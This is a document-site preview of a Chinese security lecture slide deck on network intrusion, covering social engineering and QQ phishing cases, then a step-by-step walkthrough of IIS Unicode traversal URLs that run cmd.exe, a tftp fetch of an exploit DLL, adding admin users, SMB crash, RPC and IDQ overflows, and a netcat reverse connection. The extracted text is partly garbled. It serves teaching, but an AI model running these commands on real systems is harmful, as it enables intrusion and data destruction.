书签 分享 收藏 举报 版权申诉 / 125
上传文档赚钱

类型社会工程学攻击网络钓鱼防范-ppt课件.ppt

  • 上传人(卖家):三亚风情
  • 文档编号:2602534
  • 上传时间:2022-05-10
  • 格式:PPT
  • 页数:125
  • 大小:4.18MB
  • 【下载声明】
    1. 本站全部试题类文档,若标题没写含答案,则无答案;标题注明含答案的文档,主观题也可能无答案。请谨慎下单,一旦售出,不予退换。
    2. 本站全部PPT文档均不含视频和音频,PPT中出现的音频或视频标识(或文字)仅表示流程,实际无音频或视频文件。请谨慎下单,一旦售出,不予退换。
    3. 本页资料《社会工程学攻击网络钓鱼防范-ppt课件.ppt》由用户(三亚风情)主动上传,其收益全归该用户。163文库仅提供信息存储空间,仅对该用户上传内容的表现方式做保护处理,对上传内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!
    4. 请根据预览情况,自愿下载本文。本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
    5. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007及以上版本和PDF阅读器,压缩文件请下载最新的WinRAR软件解压。
    配套讲稿:

    如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。

    特殊限制:

    部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。

    关 键  词:
    社会 工程学 攻击 网络 钓鱼 防范 ppt 课件
    资源描述:

    1、第第7 7讲网络入侵讲网络入侵2 2内容提要内容提要社会工程学攻击社会工程学攻击物理攻击物理攻击破解密码攻击破解密码攻击UnicodeUnicode漏洞攻击漏洞攻击缓冲区溢出漏洞攻击缓冲区溢出漏洞攻击拒绝服务攻击拒绝服务攻击winxpwinxp密码攻击实例密码攻击实例 3 32022-5-103 3 4 42022-5-104 4 一组高中学生曾经想要入侵某公司的网络,他们拟定了一个表格,调查看上去显得是无害的个人信息,例如所有秘书和行政人员和他们的配偶、孩子的名字。这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统,因为网络上的大多数人是

    2、使用宠物和他们配偶名字作为密码。5 5 李小姐是某大公司的经理秘书,她工作的电脑上存储着公李小姐是某大公司的经理秘书,她工作的电脑上存储着公司的许多重要业务资料,所以属于公司着重保护的对象,安全司的许多重要业务资料,所以属于公司着重保护的对象,安全部门设置了层层安全防护措施,可以说,她的电脑要从外部攻部门设置了层层安全防护措施,可以说,她的电脑要从外部攻破是根本不可能的事情。为了方便修改设置和查杀病毒,安全破是根本不可能的事情。为了方便修改设置和查杀病毒,安全部门可以直接通过网络服务终端对李小姐的电脑进行全面设置部门可以直接通过网络服务终端对李小姐的电脑进行全面设置。也许贪图方便,维护员与李小

    3、姐的日常联系是通过。也许贪图方便,维护员与李小姐的日常联系是通过QQQQ进行。进行。 某天李小姐刚打开某天李小姐刚打开QQQQ,就收到维护员的消息:“小李,我小李,我忘记登录密码了,快告诉我,有个紧急的安全设置要做呢!忘记登录密码了,快告诉我,有个紧急的安全设置要做呢!”因为和维护员很熟了,李小姐就把密码发了过去。因为和维护员很熟了,李小姐就把密码发了过去。一夜一夜之间,公司的主要竞争对手掌握了公司的业务!之间,公司的主要竞争对手掌握了公司的业务!6 6由于安全部门距离李小姐的工作地点有好些距离,管理不方便,所以公司让他们直接通过网络来管理机器!他与李小姐之间的联系通过QQ进行。问题偏偏就出在

    4、QQ上。作为安全人员,他自然知道密码的重要性,因此他的任何密码都设置得十分复杂,穷举几乎不可能。至于被入侵,那更不可能发生。然而百密仍有一疏百密仍有一疏,他做梦也没想到对手利用QQ的取回密码功能轻易拿到了他的密码。 李小姐正是出于对维护员的信任才被对方欺骗的。因为那个在QQ上出现的维护员根本不是公司的维护员本人,而是对手盗取了维护员的QQ,再利用一个小小的信任关系,就轻易取得了登录密码。7 7 他在输入提示答案的时候,下意识地输入了心里最重要的那个人的名字。但是对手也知道他心里那个人的名字,所谓的“知己知彼知己知彼” 绚丽的QQ秀和一些特色服务,但小马舍不得花钱。好想有免费的Q币。某天一QQ好

    5、友给他发来一个URL,还说这个网站通过一定的点击次数提供Q币。如此好的机会小马怎能放过?他根据网站的提示输入了QQ号码和密码完成注册,然后给QQ上的朋友们发了网址。然而等了许久,自己的Q币依然没有动静。第二天,小马想登录QQ时,却发现怎么也登录不上去了QQ密码被人改了。这是最近闹得轰轰烈烈的QQQQ欺骗案件欺骗案件之一。8 8大哥你是不是太搞笑?!改我密码还要5分钟啊?麻烦你快一点好不好! 还有QQ中奖要求用户填写密码以待“验证”等伎俩,无论什么手法,最终结局都是一样的,那就是用户的密码被人改掉。如此白痴的骗局,只要有点常识的人都不难理解其中的“笑话”,奇怪的是却屡屡有人上当,究其原因,就是因

    6、为国人的贪小便宜心理作祟。 这就是著名的“网络钓鱼”!论坛常有帖子:“腾讯公司预留了专用号码作为充值号,此号是自动读取指令的,为了不引起大家的注意,所以这个QQ比较普通,这个QQ一般隐身。只要发送Jerusalum/PLO号码Vesselin Bontchev密码FRALDMUZK Q币数量,然后下线5分钟,等着收Q币吧。”9 9 王先生是一家银行的职员,通常都是直接在网络上完成转账操作的。由于他的电脑水平不高,前不久被一个初学者骇客入侵了机器。在请来专业人员修复系统更改密码后,王先生照例登录网络银行为手机缴费,可是才过一会儿他的冷汗就出来了:网络银行登录不进去了!深感大事不妙的王先生去银行办

    7、理了相关手续,查账发现账户里的钱已经被人划走了。因为王先生犯了大部分人都会犯的致命错误:通常为了记忆方便,人们因为王先生犯了大部分人都会犯的致命错误:通常为了记忆方便,人们会把会把几处的密码都设置成一样的,例如的,例如QQQQ、E-MAILE-MAIL、FTPFTP、网站等的密码、网站等的密码,而王先生更进一步把所有密码都弄成一样的了,因此入侵者在得到王先生,而王先生更进一步把所有密码都弄成一样的了,因此入侵者在得到王先生的机器登录密码后也就得到了网络银行的密码。正是因为这个普遍心理特点的机器登录密码后也就得到了网络银行的密码。正是因为这个普遍心理特点,受害者往往都是被入侵者一锅端了!,受害者

    8、往往都是被入侵者一锅端了!因为简单密码和相同密码是大部分人都会碰到的心理弱点 1010 11112022-5-101111 12122022-5-101212 13132022-5-101313 14142022-5-101414 15152022-5-101515 16162022-5-101616 17172022-5-101717 18182022-5-101818 19192022-5-101919 20202022-5-102020 21212022-5-102121 22222022-5-102222 23232022-5-102323 24242022-5-102424 2525

    9、2022-5-102525 26262022-5-102626 27272022-5-102727 28282022-5-102828 29292022-5-102929 30302022-5-103030 31312022-5-103131 32322022-5-103232 33332022-5-103333 34342022-5-103434 35352022-5-103535 36362022-5-103636 37372022-5-103737 38382022-5-103838 39392022-5-103939 40402022-5-104040 41412022-5-10414

    10、1 42422022-5-10Office Password Remover42424343通过打操作系统的补丁程序,就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。Unicode漏洞是2000-10-17发现的,受影响的版本:1.Microsoft IIS 5.0+Microsoft Win2K系列版本2.Microsoft IIS 4.0+ Windows NT 4.0消除该漏洞的方式是安装操作系统的补丁,只要安装了SP1以后,该漏洞就不存在了。微软IIS 4.0和5.0都存在利用扩展扩展UNICODEUNICODE字符取代字符取代/和和而而能利用能利用./

    11、./目录遍历目录遍历的漏洞。4444使用扫描工具X-Scan来检测Unicode漏洞是否存在。目标主机IP为:172.18.25.109,Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了,X-Scan设置。4545将主机添加到目标地址,扫描结果如图。4646只要是/scripts开头的漏洞都是Unicode漏洞。比如:/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir其其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录4747scripts目录一般系统盘根目录下的Inetpub目录下4848在Windo

    12、ws的目录中,可以使用 “./”来访问上一级目录在浏览器中利用“scripts/././”可以访问到系统盘根目录,访问“scripts/././winnt/system32”就访问到系统的system32了,在system32目录下包含许多重要的系统文件,比如cmd、net命令,可以利用该文件新建用户,删除文件等操作。浏览器地址栏中禁用符号浏览器地址栏中禁用符号“./”./”,但是可以使用符号“/”的Unicode的编码。比如 “/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f%c0%2f”就是“/ /”的Unicode编码。这

    13、条语句是执行dir命令列出目录结构。4949此漏洞从中文IIS4.0+SP6开始,此外还影响中文WIN2k+IIS5.0、中文WIN2k+IIS5.0+SP1,繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af5050利用该漏洞读取出计算机上目录列表,比读取利用该漏洞读取出计算机上目录列表,比读取C C盘的目录盘的目录:http:/172.18.2

    14、5.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:5151利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。http:/172.18.25.109/scripts/.%c0%2f./winnt/http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.inisystem32/cmd.exe?/c+type+c:boot.ini5252利用Unicode可以方便的更改对方的主页,若对方网站的

    15、根路径在“C:Initpubwwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。使用的语句是:http:/172.18.25.109/scripts/.%c0%2f./winnthttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwro/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.aspotdefault.asp53535454将cmd.ex

    16、e文件拷贝到scripts目录,并改名为c.exe:http:/172.18.25.109/scripts/.%c0%2f./winnt/syshttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.etem32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exexe+c.exe5555以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:http:/172.18.25.109/scripts/c.exe?/c+d

    17、ir+c:http:/172.18.25.109/scripts/c.exe?/c+dir+c:5656在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限。首先需要向对方服务器上传一些文件,入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。需要上传一个名为“idq.dll”的文件,为了上传这个文件,首先在本地计算机上搭建一个TFTP服务器,它一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程

    18、序。 57575858在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。在浏览器中执行命令:“http:/172.18.25.109/scripts/.%c0%2f./winnt/system3http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”2/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”,命令其实是“tftp i 172.18.25.110 get idq.dl

    19、l”意思是从172.18.25.110服务器上获取idq.dll文件59596060拷贝ispc.exe到本地计算机的C:,在命令行下执行:“ispc.exe 172.18.25.109/scripts/idq.dllispc.exe 172.18.25.109/scripts/idq.dll”,连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限。 6161可以在对方计算机上做管理员可以做的一切事情,比如添加用户。建立用户名:Hacker123,密码:Hacker1236262利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户(用户名与密码均为:hax)。经过测试,该漏洞

    20、在SP2、SP3以及SP4版本上依然存在,但是不能保证100%入侵成功。 工具:cniis.exe,格式是:cniis 172.18.25.109 0参数参数1 1:是目标的IP地址,参数参数2 2:目标系统的补丁号因为172.18.25.109没有打补丁,这里就是0。6363SMB(Session Message Block,会话消息块协议会话消息块协议)又叫做NetBIOS或LanManager协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。SMB协议版本有很多种,在Windows 98、Windows NT、Windows 2000

    21、和XP使用的是NTLM 0.12版本。利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的SMB会话包,然后利用SMB会话包登录对方的计算机。下面介绍利用SMB协议让对方操作系统系统重新启动或者蓝屏。6464使用的工具软件是:SMBDie V1.0,该软件对打了SP3、SP4的计算机依然有效,必须打专门的SMB补丁.攻击需要两个参数:对方的IP地址和对方的机器名6565然后再点按钮“Kill”,如果参数输入没有错误的话,对方计算机立刻重启或蓝屏,命中率几乎100% 66662022-5-106666 67672022-5-106767 68682022-5-106868

    22、6969远程过程调用RPC(Remote Procedure Call),是操作系统的一种消息传递功能,允许应用程序呼叫网络上的计算机。当系统启动的时候,自动加载RPC服务。可以在服务列表中看到系统的RPC服务,如图。7070RPC溢出漏洞,对SP4也适用,必须打专用补丁。利用工具scanms.exe文件检测RPC漏洞,该工具是ISS安全公司2003年7月30日发布的,运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞(823980-MS03-026)”补丁程序。如果没有安装补丁程序,该IP地址就会显示出“VULN”。首先拷贝该文件到C盘根目录

    23、,现在要检查地址段172.18.25.109到172.18.25.110的主机,执行命令“scanms.exe 172.18.25.109-172.18.25.110”7171利用工具软件attack.exe对172.18.25.109进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户,并终止了对方的RPC服务。新建用户的用户名和密码都是qing10,这样就可以登录对方计算机了,RPC服务停止操作系统将有许多功能不能使用,非常容易被管理员发现,可用OpenRpcSs来给对方重启RPC服务。727273731、利用软件Snake IIS溢出工具可以让对方的IIS溢出,还可以捆绑执行

    24、的命令和在对方计算机上开辟端口。2、它适用于各类操作系统,如对172.18.25.109进行攻击,其系统为Win 2K,没有安装补丁程序,攻击完毕后,开辟一个813端口,并在对方计算机上执行命令“dir c: 。3、点击按钮“IDQ溢出”,出现攻击成功的提示框74747575现813端口已经开放,可用nc.exe连接到该端口,将会自动执行刚才发送的命令“dir c:”,其语法:nc.exe -vv 172.18.25.109 813其中-vv是程序的参数,813是目标端口。7676利用nc和snake相互配合可入侵对方计算机。1、首先利用:nc -l -p 813 监听本地的813端口2、启动

    25、snake,本地的IP是172.18.25.110,要攻击的计算机的IP地址是172.18.25.109,选择溢出选项中的第一项,设置IP为本地IP地址,端口是8133、设置好以后,点击按钮“IDQ溢出”。4、查看nc命令的DOS框,在该界面下,已经执行了设置的DOS命令:将对方计算机的C盘根目录列出来77777878使用nc.exe和webdavx3。先修改本地系统时间到2001年。在命令后面直接跟对方的IP地址。7979若程序不能自动退出,按 “CTRL+C”退出。在对方计算机上开了一个7788端口,可用nc入侵对方的计算机。 80802022-5-108080 81812022-5-10

    26、8181 82822022-5-108282 83832022-5-108383 84842022-5-108484 85852022-5-108585 86862022-5-108686 87872022-5-10?8787 88882022-5-108888 89892022-5-108989 90902022-5-109090 91912022-5-109191 92922022-5-109292 93932022-5-109393 94942022-5-109494 95952022-5-109595 96962022-5-109696 97972022-5-109797 989820

    27、22-5-109898 99992022-5-109999 1001002022-5-10100100 1011012022-5-10101101 1021022022-5-10clienttargethandler.agent.DoSICMP Flood / SYN Flood / UDP Flood102102 1031032022-5-10103103 1041042022-5-10104104 1051052022-5-10105105 1061062022-5-10106106 1071072022-5-10107107 1081082022-5-10108108 109109202

    28、2-5-10109109 1101102022-5-10110110 1111112022-5-10111111 1121122022-5-10112112 1131132022-5-10113113 1141142022-5-10114114 1151152022-5-10115115 1161162022-5-10116116 1171172022-5-10117117 1181182022-5-10118118 1191192022-5-10119119 1201202022-5-10120120 1211212022-5-10121121 1221222022-5-10122122 1231232022-5-10123123 1241242022-5-10124124 1251252022-5-10125125

    展开阅读全文
    提示  163文库所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。
    关于本文
    本文标题:社会工程学攻击网络钓鱼防范-ppt课件.ppt
    链接地址:https://www.163wenku.com/p-2602534.html

    Copyright@ 2017-2037 Www.163WenKu.Com  网站版权所有  |  资源地图   
    IPC备案号:蜀ICP备2021032737号  | 川公网安备 51099002000191号


    侵权投诉QQ:3464097650  资料上传QQ:3464097650
       


    【声明】本站为“文档C2C交易模式”,即用户上传的文档直接卖给(下载)用户,本站只是网络空间服务平台,本站所有原创文档下载所得归上传人所有,如您发现上传作品侵犯了您的版权,请立刻联系我们并提供证据,我们将在3个工作日内予以改正。

    163文库